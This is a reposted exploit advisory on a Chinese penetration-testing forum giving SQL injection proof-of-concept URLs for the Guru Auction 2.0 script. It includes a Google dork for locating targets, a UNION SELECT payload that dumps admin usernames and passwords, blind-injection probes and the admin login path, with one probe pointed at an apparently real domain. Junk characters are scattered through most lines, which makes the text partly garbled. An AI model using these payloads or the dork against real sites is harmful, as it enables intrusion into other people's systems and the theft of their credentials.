中国网络渗透测试联盟

标题: Guru Auction 2.0多重sql注射 [打印本页]
作者: admin    时间: 2012-12-31 09:24
标题: Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
4 e( L9 v4 L5 ]- R+ ]; Y
! F0 C8 ~; h. G, W作者     : v3n0m
& E2 ~9 t& R% Y& N* Q应用 : Guru Auction 2.0) |& z/ @! L$ k' g
Price       : $497 }5 z/ ^0 h) c# |  y/ ]1 K
Vendor      : http://www.guruscript.com/
( P+ ^/ x, X0 jGoogle Dork : inurl:subcat.php?cate_id=
# w, n5 l- j( {, i) ]
8 ?/ {/ q2 y* h, fSQLi p0c:. E% ?3 W# q  R6 y
~~~~~~~~~~
0 b9 D6 T) `7 [http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--  b& \7 v/ O) `) Z' K
; P7 @% d/ O6 g* @$ i
" J  ?5 h8 ~* O. Q( @- X- b7 q, S+ `
盲注 p0c:* H. X/ ]% W" x+ c7 d, u
~~~~~~~~~~  S! D1 O- D7 Y$ m+ U1 x! h4 @
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true) p& c6 }) y! C0 C) }/ W) I
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false- P6 D9 S1 ~7 D4 D
$ O4 C8 Z" [  }/ F* b4 w8 g
管理登录入口:# [) d/ ^. w7 j& D- v) R
~~~~~~~~~~
' y+ t8 O; [7 y; m( V7 {. Yhttp://domain.tld/[path]/admin/
/ t5 ^* K' j" ?; X: T' S* f6 h2 f



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2